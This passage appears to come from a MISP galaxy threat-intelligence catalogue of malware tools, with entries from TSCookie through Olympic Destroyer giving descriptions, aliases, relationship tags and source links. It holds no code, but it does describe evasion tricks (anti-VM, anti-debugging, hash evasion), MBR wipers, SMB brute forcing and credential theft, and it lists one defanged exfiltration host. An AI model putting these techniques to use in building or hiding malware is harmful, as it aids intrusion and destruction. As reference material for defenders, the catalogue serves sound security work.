  • similar: misp-galaxy:malpedia="TSCookie" with estimative-language:likelihood-probability="almost-certain"

Table 16587. Table References

Links

http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html

Exforel

Exforel backdoor malware, VirTool:WinNT/Exforel.A, backdoor implemented at the Network Driver Interface Specification (NDIS) level.

The tag is: misp-galaxy:tool="Exforel"

Table 16588. Table References

Links

http://news.softpedia.com/news/Exforel-Backdoor-Implemented-at-NDIS-Level-to-Be-More-Stealthy-Experts-Say-313567.shtml

Rotinom

W32.Rotinom is a worm that spreads by copying itself to removable drives.

The tag is: misp-galaxy:tool="Rotinom"

Table 16589. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-011117-0057-99

Aurora

You probably have heard the recent news about a widespread attack that was carried out using a 0-Day exploit for Internet Explorer as one of the vectors. This exploit is also known as the "Aurora Exploit". The code has recently gone public and it was also added to the Metasploit framework. This exploit was used to deliver a malicious payload, known by the name of Trojan.Hydraq, the main purpose of which was to steal information from the compromised computer and report it back to the attackers. The exploit code makes use of known techniques to exploit a vulnerability that exists in the way Internet Explorer handles a deleted object. The final purpose of the exploit itself is to access an object that was previously deleted, causing the code to reference a memory location over which the attacker has control and in which the attacker dropped his malicious code.

The tag is: misp-galaxy:tool="Aurora"

Aurora is also known as:

  • Hydraq

Aurora has relationships with:

  • similar: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"

Table 16590. Table References

Links

https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back

https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions

Cheshire Cat

Oldest Cheshire Cat malware compiled in 2002. It’s a very old family of malware. The time stamps may be forged but the malware does have support for very old operating systems. The 2002 implant retrieves a handle for an asr2892 drives that they never got their hands on. It checks for a NE header which is a header type used before PE headers even existed. References to 16bit or DOS on a non 9x platform. This malware implant IS REALLY for old systems. The malware is for espionage - it’s very carefully made to stay hidden. Newer versions install as icon handler shell extension for .lnk files. Shell in this case means the program manager because windows explorer was not yet a thing. It sets up COM server objects. It looks like it was written in pure C, but made to look like C++. A sensitive implant as well: it checks for all kinds of old MS platforms including Windows NT, win95, win98, winME and more. It checks the patch level as well. A lot of effort was put into adapting this malware to a lot of different operating systems with very granular decision chains.

The tag is: misp-galaxy:tool="Cheshire Cat"

Table 16591. Table References

Links

https://www.youtube.com/watch?v=u2Ry9HTBbZI

https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/

https://www.peerlyst.com/posts/hack-lu-2016-recap-interesting-malware-no-i-m-not-kidding-by-marion-marschalek-claus-cramon

Downloader-FGO

Downloader-FGO is a trojan that comes hidden in malicious programs. Once you install the source (carrier) program, this trojan attempts to gain "root" access (administrator level access) to your computer without your knowledge

The tag is: misp-galaxy:tool="Downloader-FGO"

Downloader-FGO is also known as:

  • Win32:Malware-gen

  • Generic30.ASYL (Trojan horse)

  • TR/Agent.84480.85

  • Trojan.Generic.8627031

  • Trojan:Win32/Sisproc

  • SB/Malware

  • Trj/CI.A

  • Mal/Behav-112

  • Trojan.Spuler

  • TROJ_KAZY.SM1

  • Win32/FakePPT_i

Table 16592. Table References

Links

https://www.solvusoft.com/en/malware/trojans/downloader-fgo/

miniFlame

Newly discovered spying malware designed to steal data from infected systems was likely built from the same cyber-weaponry factory that produced two other notorious cyberespionage software Flame and Gauss, a security vendor says. Kaspersky Lab released a technical paper Monday outlining the discovery of the malware the vendor has dubbed "miniFlame." While capable of working with Flame and Gauss, miniFlame is a "small, fully functional espionage module designed for data theft and direct access to infected systems," Kaspersky said.

The tag is: misp-galaxy:tool="miniFlame"

Table 16593. Table References

Links

https://securelist.com/miniflame-aka-spe-elvis-and-his-friends-5/31730/

https://www.csoonline.com/article/2132422/malware-cybercrime/cyberespionage-malware—​miniflame—​discovered.html

GHOTEX

PE_GHOTEX.A-O is a portable executable (PE is the standard executable format for 32-bit Windows files) virus. PE viruses infect executable Windows files by incorporating their code into these files such that they are executed when the infected files are opened.

The tag is: misp-galaxy:tool="GHOTEX"

Table 16594. Table References

Links

https://www.trendmicro.com/vinfo/dk/threat-encyclopedia/archive/malware/pe_ghotex.a-o

Neuron

Neuron consists of both client and server components. The Neuron client and Neuron service are written using the .NET framework with some codebase overlaps. The Neuron client is used to infect victim endpoints and extract sensitive information from local client machines. The Neuron server is used to infect network infrastructure such as mail and web servers, and acts as local Command & Control (C2) for the client component. Establishing a local C2 limits interaction with the target network and remote hosts. It also reduces the log footprint of actor infrastructure and enables client interaction to appear more convincing as the traffic is contained within the target network.

The tag is: misp-galaxy:tool="Neuron"

Neuron has relationships with:

  • similar: misp-galaxy:malpedia="Neuron" with estimative-language:likelihood-probability="likely"

Table 16596. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf

Nautilus

Nautilus is very similar to Neuron both in the targeting of mail servers and how client communications are performed. This malware is referred to as Nautilus due to its embedded internal DLL name “nautilus-service.dll”, again sharing some resemblance to Neuron. The Nautilus service listens for HTTP requests from clients to process tasking requests such as executing commands, deleting files and writing files to disk

The tag is: misp-galaxy:tool="Nautilus"

Nautilus has relationships with:

  • similar: misp-galaxy:malpedia="Nautilus" with estimative-language:likelihood-probability="likely"

Table 16597. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf

Gamut Botnet

Gamut was found to be downloaded by a Trojan Downloader that arrives as an attachment from a spam email message. The bot installation is quite simple. After the malware binary has been downloaded, it launches itself from its current directory, usually the Windows %Temp% folder and installs itself as a Windows service. The malware utilizes an anti-VM (virtual machine) trick and terminates itself if it detects that it is running in a virtual machine environment. The bot uses INT 03h trap sporadically in its code, an anti-debugging technique which prevents its code from running within a debugger environment. It can also determine if it is being debugged by using the Kernel32 API - IsDebuggerPresent function.

The tag is: misp-galaxy:tool="Gamut Botnet"

Table 16598. Table References

Links

https://www.bleepingcomputer.com/news/security/necurs-and-gamut-botnets-account-for-97-percent-of-the-internets-spam-emails/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Gamut-Spambot-Analysis/

CORALDECK

CORALDECK is an exfiltration tool that searches for specified files and exfiltrates them in password protected archives using hardcoded HTTP POST headers. CORALDECK has been observed dropping and using Winrar to exfiltrate data in password protected RAR files as well as WinImage and zip archives

The tag is: misp-galaxy:tool="CORALDECK"

CORALDECK is also known as:

  • APT.InfoStealer.Win.CORALDECK

  • FE_APT_InfoStealer_Win_CORALDECK_1

CORALDECK has relationships with:

  • similar: misp-galaxy:mitre-malware="CORALDECK - S0212" with estimative-language:likelihood-probability="likely"

Table 16599. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

DOGCALL

DOGCALL is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex. DOGCALL was used to target South Korean Government and military organizations in March and April 2017. The malware is typically dropped using an HWP exploit in a lure document. The wiper tool, RUHAPPY, was found on some of the systems targeted by DOGCALL. While DOGCALL is primarily an espionage tool, RUHAPPY is a destructive wiper tool meant to render systems inoperable.

The tag is: misp-galaxy:tool="DOGCALL"

DOGCALL is also known as:

  • FE_APT_RAT_DOGCALL

  • FE_APT_Backdoor_Win32_DOGCALL_1

  • APT.Backdoor.Win.DOGCALL

DOGCALL has relationships with:

  • similar: misp-galaxy:mitre-malware="DOGCALL - S0213" with estimative-language:likelihood-probability="likely"

Table 16600. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

GELCAPSULE

GELCAPSULE is a downloader traditionally dropped or downloaded by an exploit document. GELCAPSULE has been observed downloading SLOWDRIFT to victim systems.

The tag is: misp-galaxy:tool="GELCAPSULE"

GELCAPSULE is also known as:

  • FE_APT_Downloader_Win32_GELCAPSULE_1

Table 16601. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

HAPPYWORK

HAPPYWORK is a malicious downloader that can download and execute a second-stage payload, collect system information, and beacon it to the command and control domains. The collected system information includes: computer name, user name, system manufacturer via registry, IsDebuggerPresent state, and execution path. In November 2016, HAPPYWORK targeted government and financial targets in South Korea.

The tag is: misp-galaxy:tool="HAPPYWORK"

HAPPYWORK is also known as:

  • FE_APT_Downloader_HAPPYWORK

  • FE_APT_Exploit_HWP_Happy

  • Downloader.APT.HAPPYWORK

HAPPYWORK has relationships with:

  • similar: misp-galaxy:mitre-malware="HAPPYWORK - S0214" with estimative-language:likelihood-probability="likely"

Table 16602. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

KARAE

Karae backdoors are typically used as first-stage malware after an initial compromise. The backdoors can collect system information, upload and download files, and may be used to retrieve a second-stage payload. The malware uses public cloud-based storage providers for command and control. In March 2016, KARAE malware was distributed through torrent file-sharing websites for South Korean users. During this campaign, the malware used a YouTube video downloader application as a lure.

The tag is: misp-galaxy:tool="KARAE"

KARAE is also known as:

  • FE_APT_Backdoor_Karae_enc

  • FE_APT_Backdoor_Karae

  • Backdoor.APT.Karae

KARAE has relationships with:

  • similar: misp-galaxy:mitre-malware="KARAE - S0215" with estimative-language:likelihood-probability="likely"

Table 16603. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

MILKDROP

MILKDROP is a launcher that sets a persistence registry key and launches a backdoor.

The tag is: misp-galaxy:tool="MILKDROP"

MILKDROP is also known as:

  • FE_Trojan_Win32_MILKDROP_1

Table 16604. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

POORAIM

POORAIM malware is designed with basic backdoor functionality and leverages AOL Instant Messenger for command and control communications. POORAIM includes the following capabilities: System information enumeration, File browsing, manipulation and exfiltration, Process enumeration, Screen capture, File execution, Exfiltration of browser favorites, and battery status. Exfiltrated data is sent via files over AIM. POORAIM has been involved in campaigns against South Korean media organizations and sites relating to North Korean refugees and defectors since early 2014. Compromised sites have acted as watering holes to deliver newer variants of POORAIM.

The tag is: misp-galaxy:tool="POORAIM"

POORAIM is also known as:

  • Backdoor.APT.POORAIM

POORAIM has relationships with:

  • similar: misp-galaxy:mitre-malware="POORAIM - S0216" with estimative-language:likelihood-probability="likely"

Table 16605. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RICECURRY

RICECURRY is a Javascript based profiler used to fingerprint a victim’s web browser and deliver malicious code in return. Browser, operating system, and Adobe Flash version are detected by RICECURRY, which may be a modified version of PluginDetect.

The tag is: misp-galaxy:tool="RICECURRY"

RICECURRY is also known as:

  • Exploit.APT.RICECURRY

Table 16606. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RUHAPPY

RUHAPPY is a destructive wiper tool seen on systems targeted by DOGCALL. It attempts to overwrite the MBR, causing the system not to boot. When victims' systems attempt to boot, the string 'Are you Happy?' is displayed. The malware is believed to be tied to the developers of DOGCALL and HAPPYWORK based on similar PDB paths in all three.

The tag is: misp-galaxy:tool="RUHAPPY"

RUHAPPY is also known as:

  • FE_APT_Trojan_Win32_RUHAPPY_1

Table 16607. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SHUTTERSPEED

SHUTTERSPEED is a backdoor that can collect system information, acquire screenshots, and download/execute an arbitrary executable. SHUTTERSPEED typically requires an argument at runtime in order to execute fully. Observed arguments used by SHUTTERSPEED include: 'help', 'console', and 'sample'. The spear phishing email messages contained documents exploiting RTF vulnerability CVE-2017-0199. Many of the compromised domains in the command and control infrastructure are linked to South Korean companies. Most of these domains host a fake webpage pertinent to targets.

The tag is: misp-galaxy:tool="SHUTTERSPEED"

SHUTTERSPEED is also known as:

  • FE_APT_Backdoor_SHUTTERSPEED

  • APT.Backdoor.SHUTTERSPEED

SHUTTERSPEED has relationships with:

  • similar: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217" with estimative-language:likelihood-probability="likely"

Table 16608. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SLOWDRIFT

SLOWDRIFT is a launcher that communicates via cloud based infrastructure. It sends system information to the attacker command and control and then downloads and executes additional payloads.Lure documents distributing SLOWDRIFT were not tailored for specific victims, suggesting that TEMP.Reaper is attempting to widen its target base across multiple industries and in the private sector. SLOWDRIFT was seen being deployed against academic and strategic targets in South Korea using lure emails with documents leveraging the HWP exploit. Recent SLOWDRIFT samples were uncovered in June 2017 with lure documents pertaining to cyber crime prevention and news stories. These documents were last updated by the same actor who developed KARAE, POORAIM and ZUMKONG.

The tag is: misp-galaxy:tool="SLOWDRIFT"

SLOWDRIFT is also known as:

  • FE_APT_Downloader_Win_SLOWDRIFT_1

  • FE_APT_Downloader_Win_SLOWDRIFT_2

  • APT.Downloader.SLOWDRIFT

SLOWDRIFT has relationships with:

  • similar: misp-galaxy:mitre-malware="SLOWDRIFT - S0218" with estimative-language:likelihood-probability="likely"

Table 16609. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

SOUNDWAVE

SOUNDWAVE is a windows based audio capturing utility. Via command line it accepts the -l switch (for listen probably), captures microphone input for 100 minutes, writing the data out to a log file in this format: C:\Temp\HncDownload\YYYYMMDDHHMMSS.log.

The tag is: misp-galaxy:tool="SOUNDWAVE"

SOUNDWAVE is also known as:

  • FE_APT_HackTool_Win32_SOUNDWAVE_1

Table 16610. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

ZUMKONG

ZUMKONG is a credential stealer capable of harvesting usernames and passwords stored by Internet Explorer and Chrome browsers. Stolen credentials are emailed to the attacker via HTTP POST requests to mail[.]zmail[.]ru.

The tag is: misp-galaxy:tool="ZUMKONG"

ZUMKONG is also known as:

  • FE_APT_Trojan_Zumkong

  • Trojan.APT.Zumkong

Table 16611. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

WINERACK

WINERACK is backdoor whose primary features include user and host information gathering, process creation and termination, filesystem and registry manipulation, as well as the creation of a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands. Other capabilities include the enumeration of files, directories, services, active windows and processes.

The tag is: misp-galaxy:tool="WINERACK"

WINERACK is also known as:

  • FE_APT_Backdoor_WINERACK

  • Backdoor.APT.WINERACK

WINERACK has relationships with:

  • similar: misp-galaxy:mitre-malware="WINERACK - S0219" with estimative-language:likelihood-probability="likely"

Table 16612. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

RoyalCli

The RoyalCli backdoor appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary: 'c:\users\wizard\documents\visual studio 2010\Projects\RoyalCli\Release\RoyalCli.pdb' RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2. Due to the nature of the technique, this results in C2 data being cached to disk by the IE process; we’ll get to this later.

The tag is: misp-galaxy:tool="RoyalCli"

RoyalCli has relationships with:

  • similar: misp-galaxy:malpedia="RoyalCli" with estimative-language:likelihood-probability="likely"

Table 16613. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

SHARPKNOT

The tag is: misp-galaxy:tool="SHARPKNOT"

SHARPKNOT has relationships with:

  • similar: misp-galaxy:malpedia="SHARPKNOT" with estimative-language:likelihood-probability="likely"

Table 16615. Table References

Links

https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

KillDisk Wiper

KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms. The note accompanying the ransomware versions, like in the case of Petya, was a ruse: Because KillDisk also overwrites and deletes files (and don’t store the encryption keys on disk or online), recovering the scrambled files was out of the question. The new variant we found, however, does not include a ransom note.

The tag is: misp-galaxy:tool="KillDisk Wiper"

KillDisk Wiper is also known as:

  • KillDisk

KillDisk Wiper has relationships with:

  • similar: misp-galaxy:malpedia="KillDisk" with estimative-language:likelihood-probability="likely"

Table 16616. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/

UselessDisk

A new MBR bootlocker called DiskWriter, or UselessDisk, has been discovered that overwrites the MBR of a victim’s computer and then displays a ransom screen on reboot instead of booting into Windows. This ransom note asks for $300 in bitcoins in order to gain access to Windows again. Might be a wiper.

The tag is: misp-galaxy:tool="UselessDisk"

UselessDisk is also known as:

  • DiskWriter

Table 16617. Table References

Links

https://www.bleepingcomputer.com/news/security/the-diskwriter-or-uselessdisk-bootlocker-may-be-a-wiper/

GoScanSSH

During a recent Incident Response (IR) engagement, Talos identified a new malware family that was being used to compromise SSH servers exposed to the internet. This malware, which we have named GoScanSSH, was written using the Go programming language, and exhibited several interesting characteristics. This is not the first malware family that Talos has observed that was written using Go. However, it is relatively uncommon to see malware written in this programming language. In this particular case, we also observed that the attacker created unique malware binaries for each host that was infected with the GoScanSSH malware. Additionally, the GoScanSSH command and control (C2) infrastructure was observed leveraging the Tor2Web proxy service in an attempt to make tracking the attacker-controlled infrastructure more difficult and resilient to takedowns.

The tag is: misp-galaxy:tool="GoScanSSH"

Table 16618. Table References

Links

http://blog.talosintelligence.com/2018/03/goscanssh-analysis.html

https://www.bleepingcomputer.com/news/security/goscanssh-malware-avoids-government-and-military-servers/

Rovnix

We recently found that the malware family ROVNIX is capable of being distributed via macro downloader. This malware technique was previously seen in the DRIDEX malware, which was notable for using the same routines. DRIDEX is also known as the successor of the banking malware CRIDEX.

The tag is: misp-galaxy:tool="Rovnix"

Rovnix is also known as:

  • ROVNIX

Rovnix has relationships with:

  • similar: misp-galaxy:malpedia="Rovnix" with estimative-language:likelihood-probability="likely"

Table 16619. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Kwampirs

Once Orangeworm has infiltrated a victim’s network, they deploy Trojan.Kwampirs, a backdoor Trojan that provides the attackers with remote access to the compromised computer. When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.

The tag is: misp-galaxy:tool="Kwampirs"

Kwampirs has relationships with:

  • similar: misp-galaxy:malpedia="Kwampirs" with estimative-language:likelihood-probability="likely"

Table 16620. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Rubella Macro Builder

A crimeware kit dubbed the Rubella Macro Builder has recently been gaining popularity among members of a top-tier Russian hacking forum. Despite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it’s cheap, fast, and can defeat basic static antivirus detection.

The tag is: misp-galaxy:tool="Rubella Macro Builder"

Table 16621. Table References

Links

https://www.flashpoint-intel.com/blog/rubella-macro-builder/

kitty Malware

Researchers at Imperva’s Incapsula said a new piece malware called Kitty leaves a note for cat lovers. It attacks the Drupal content management system (CMS) to illegally mine cryptocurrency Monero.

The tag is: misp-galaxy:tool="kitty Malware"

Table 16622. Table References

Links

https://www.zdnet.com/article/hello-kitty-malware-targets-drupal-to-mine-for-cryptocurrency/

https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/

https://cryptovest.com/news/hello-kitty-new-malware-me0ws-its-way-into-mining-monero/

Maikspy

We discovered a malware family called Maikspy — a multi-platform spyware that can steal users’ private data. The spyware targets Windows and Android users, and first posed as an adult game named after a popular U.S.-based adult film actress. Maikspy, which is an alias that combines the name of the adult film actress and spyware, has been around since 2016.

The tag is: misp-galaxy:tool="Maikspy"

Table 16623. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/maikspy-spyware-poses-as-adult-game-targets-windows-and-android-users/

Huigezi malware

backdoor trojan popular found prevalently in China

The tag is: misp-galaxy:tool="Huigezi malware"

Table 16624. Table References

Links

https://www.bleepingcomputer.com/news/gaming/chinese-police-arrest-15-people-who-hid-malware-inside-pubg-cheat-apps/

FacexWorm

Facebook, Chrome, and cryptocurrency users should be on the lookout for a new malware strain named FacexWorm that infects victims for the purpose of stealing passwords, stealing cryptocurrency funds, running cryptojacking scripts, and spamming Facebook users. This new strain was spotted in late April by Trend Micro researchers and appears to be related to two other Facebook Messenger spam campaigns, one that took place last August, and another one from December 2017, the latter spreading the Digmine malware. Researchers say FacexWorm’s modus operandi is similar to the previous two campaigns, but with the addition of new techniques aimed at cryptocurrency users.

The tag is: misp-galaxy:tool="FacexWorm"

Table 16625. Table References

Links

https://www.bleepingcomputer.com/news/security/facexworm-spreads-via-facebook-messenger-malicious-chrome-extension/

Bankshot

implant used in Operation GhostSecret

The tag is: misp-galaxy:tool="Bankshot"

Bankshot has relationships with:

  • similar: misp-galaxy:malpedia="Bankshot" with estimative-language:likelihood-probability="likely"

Table 16626. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

Proxysvc

downloader used in Operation GhostSecret

The tag is: misp-galaxy:tool="Proxysvc"

Table 16627. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

Escad

backdoor used in Operation GhostSecret

The tag is: misp-galaxy:tool="Escad"

Table 16628. Table References

Links

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

StalinLocker

A new in-development screenlocker/wiper called StalinLocker, or StalinScreamer, was discovered by MalwareHunterTeam that gives you 10 minutes to enter a code or it will try to delete the contents of the drives on the computer. While running, it will display screen that shows Stalin while playing the USSR anthem and displaying a countdown until files are deleted.

The tag is: misp-galaxy:tool="StalinLocker"

StalinLocker is also known as:

  • StalinScreamer

StalinLocker has relationships with:

  • similar: misp-galaxy:malpedia="StalinLocker" with estimative-language:likelihood-probability="almost-certain"

Table 16629. Table References

Links

https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/

VPNFilter

Advanced, likely state-sponsored or state-affiliated modular malware. The code of this malware overlaps with versions of the BlackEnergy malware. Targeted devices are Linksys, MikroTik, NETGEAR and TP-Link networking equipment in the small and home office (SOHO) space, as well as QNAP network-attached storage (NAS) systems.

The tag is: misp-galaxy:tool="VPNFilter"

VPNFilter has relationships with:

  • similar: misp-galaxy:malpedia="VPNFilter" with estimative-language:likelihood-probability="almost-certain"

Table 16630. Table References

Links

https://blog.talosintelligence.com/2018/05/VPNFilter.html

https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/new-vpnfilter-malware-infects-routers/

https://www.fortinet.com/blog/threat-research/defending-against-the-new-vpnfilter-botnet.html

Iron Backdoor

Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s Soldier implant leaked source code. Iron Backdoor is also using the DynamicCall module from HackingTeam core library. Backdoor was used to drop cryptocurrency miners.

The tag is: misp-galaxy:tool="Iron Backdoor"

Table 16631. Table References

Links

https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/

Brambul

Brambul malware is a malicious Windows 32-bit SMB worm that functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims’ networks by dropper malware. When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.

The tag is: misp-galaxy:tool="Brambul"

Brambul has relationships with:

  • similar: misp-galaxy:malpedia="Brambul" with estimative-language:likelihood-probability="likely"

Table 16632. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-149A

PLEAD

PLEAD has two kinds – RAT (Remote Access Tool) and downloader. The RAT operates based on commands that are provided from C&C servers. On the other hand, PLEAD downloader downloads modules and runs it on memory in the same way as TSCookie does.

The tag is: misp-galaxy:tool="PLEAD"

PLEAD has relationships with:

  • similar: misp-galaxy:malpedia="PLEAD (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="TSCookie" with estimative-language:likelihood-probability="likely"

Table 16633. Table References

Links

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

BabaYaga

The group behind BabaYaga —believed to be Russian-speaking hackers— uses this malware to inject sites with special keyboards to drive SEO traffic to hidden pages on compromised sites. These pages are then used to redirect users to affiliate marketing links, where if the user purchases advertised goods, the hackers also make a profit. The malware per-se is comprised of two modules —one that injects the spam content inside the compromised sites, and a backdoor module that gives attackers control over an infected site at any time. The intricacies of both modules are detailed in much more depth in this 26-page report authored by Defiant (formerly known as WordFence), the security firm which dissected the malware’s more recent versions. "[BabaYaga] is relatively well-written, and it demonstrates that the author has some understanding of software development challenges, like code deployment, performance and management," Defiant researchers say. "It can also infect Joomla and Drupal sites, or even generic PHP sites, but it is most fully developed around Wordpress."

The tag is: misp-galaxy:tool="BabaYaga"

Table 16634. Table References

Links

https://www.bleepingcomputer.com/news/security/lol-babayaga-wordpress-malware-updates-your-site/

InvisiMole

Except for the malware’s binary file, very little is known of who’s behind it, how it spreads, or in what types of campaigns has this been used.

"Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia," said ESET researcher Zuzana Hromcová, who recently penned an in-depth report about this new threat.

"All infection vectors are possible, including installation facilitated by physical access to the machine," Hromcová added.

Typical to malware used in highly-targeted attacks, the malware has been stripped of most clues that could lead researchers back to its author. With the exception of one file (dating to October 13, 2013), all compilation dates have been stripped and replaced with zeros, giving little clues regarding its timeline and lifespan.

Furthermore, the malware is some clever piece of coding in itself, as it’s comprised of two modules, both with their own set of spying features, but which can also help each other in exfiltrating data.

The tag is: misp-galaxy:tool="InvisiMole"

InvisiMole has relationships with:

  • similar: misp-galaxy:malpedia="InvisiMole" with estimative-language:likelihood-probability="likely"

Table 16635. Table References

Links

https://www.bleepingcomputer.com/news/security/invisimole-is-a-complex-spyware-that-can-take-pictures-and-record-audio/

Roaming Mantis

Roaming Mantis malware is designed for distribution through a simple, but very efficient trick based on a technique known as DNS hijacking. When a user attempts to access any website via a compromised router, they will be redirected to a malicious website. For example, if a user were to navigate to www.securelist.com using a web browser, the browser would be redirected to a rogue server which has nothing to do with the security research blog. As long as the browser displays the original URL, users are likely to believe the website is genuine. The web page from the rogue server displays the popup message: To better experience the browsing, update to the latest chrome version.

The tag is: misp-galaxy:tool="Roaming Mantis"

Roaming Mantis has relationships with:

  • similar: misp-galaxy:malpedia="Roaming Mantis" with estimative-language:likelihood-probability="likely"

Table 16636. Table References

Links

https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/

PLEAD Downloader

PLEAD is referred to both as a name of malware including TSCookie and its attack campaign. PLEAD has two kinds – RAT (Remote Access Tool) and downloader. The RAT operates based on commands that are provided from C&C servers. On the other hand, PLEAD downloader downloads modules and runs it on memory in the same way as TSCookie does.

The tag is: misp-galaxy:tool="PLEAD Downloader"

Table 16637. Table References

Links

https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html

ClipboardWalletHijacker

The malware’s purpose is to intercept content recorded in the Windows clipboard, look for strings resembling Bitcoin and Ethereum addresses, and replace them with ones owned by the malware’s authors. ClipboardWalletHijacker’s end-plan is to hijack BTC and ETH transactions, so victims unwittingly send funds to the malware’s authors.

The tag is: misp-galaxy:tool="ClipboardWalletHijacker"

Table 16638. Table References

Links

https://www.bleepingcomputer.com/news/security/clipboard-hijacker-targeting-bitcoin-and-ethereum-users-infects-over-300-0000-pcs/

https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/

TYPEFRAME

Trojan malware

The tag is: misp-galaxy:tool="TYPEFRAME"

Table 16639. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

Olympic Destroyer

The Winter Olympics this year is being held in Pyeongchang, South Korea. The Guardian, a UK Newspaper reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. Sunday 11th February the Olympic games officials confirmed a cyber attack occurred but did not comment or speculate further. Talos have identified the samples, with moderate confidence, used in this attack. The infection vector is currently unknown as we continue to investigate. The samples identified, however, are not from adversaries looking for information from the games but instead they are aimed to disrupt the games. The samples analysed appear to perform only destructive functionality. There does not appear to be any exfiltration of data. Analysis shows that actors are again favouring legitimate pieces of software as PsExec functionality is identified within the sample. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This is something we have witnessed previously with BadRabbit and Nyetya.

The tag is: misp-galaxy:tool="Olympic Destroyer"

Olympic Destroyer has relationships with:

  • similar: misp-galaxy:malpedia="Olympic Destroyer" with estimative-language:likelihood-probability="likely"

Table 16640. Table References

Links

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.bleepingcomputer.com/news/security/malware-that-hit-pyeongchang-olympics-deployed-in-new-attacks/

DDKONG

